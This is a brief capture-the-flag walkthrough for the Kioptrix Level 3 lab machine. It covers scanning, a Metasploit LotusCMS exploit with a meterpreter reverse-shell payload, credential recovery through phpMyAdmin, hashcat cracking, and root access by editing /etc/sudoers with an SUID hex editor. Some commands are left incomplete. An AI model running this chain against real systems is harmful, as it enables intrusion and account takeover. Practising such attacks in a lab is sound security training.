vulhub-Kioptrix Level 3


  • netdiscover
  • Nmap
  • Nikto
  • Metasploit
  • Wfuzz
  • Hashcat

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Ports 22 and 80 are opening.

Now use Nikto to scan:

nikto -h

Nothing excited.

Now lets browser the web page in the target.

Find the target may use LotusCMS.

In msfconsole:

search LotusCMS

find one exploit

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(lcms_php_exec) > set rhost
msf exploit(lcms_php_exec) > set uri 
msf exploit(lcms_php_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(lcms_php_exec) > set lhost

Got the shell, next step is try to get root.

In this step, I tried to enumeration all kinds of shit and use serveral vernerable kernel exploits to get the root but failed. During the emumeration. I found a ffile gconfig.php is interesting. Then I found that:

maybe the username/password for ssh, but no. Thats too easy.

So that I go back to use wfuzz the scan the http services.

Looks like it has phpmyadmin. Try that:

Log in using the username/password that just found. Successed.

review the content, found this:

now found two users and the hashed passwords:

Copy the passwords to a file use hashcat to crack it:

hashcat hash.txt /user/share/wordlists/rockyou.txt

get both passwords:

ssh to the target, search the SUID binaries:

find / -perm +6000 -type f -exec ls -ld {} \;

found an interesting file /uss/local/bin/ht, I googled it and found it is a hex editor.

now try to use it to open /etc/sudoers file, get error message. to fix it:

export TERM=xterm

change the loneferret permission:

get the root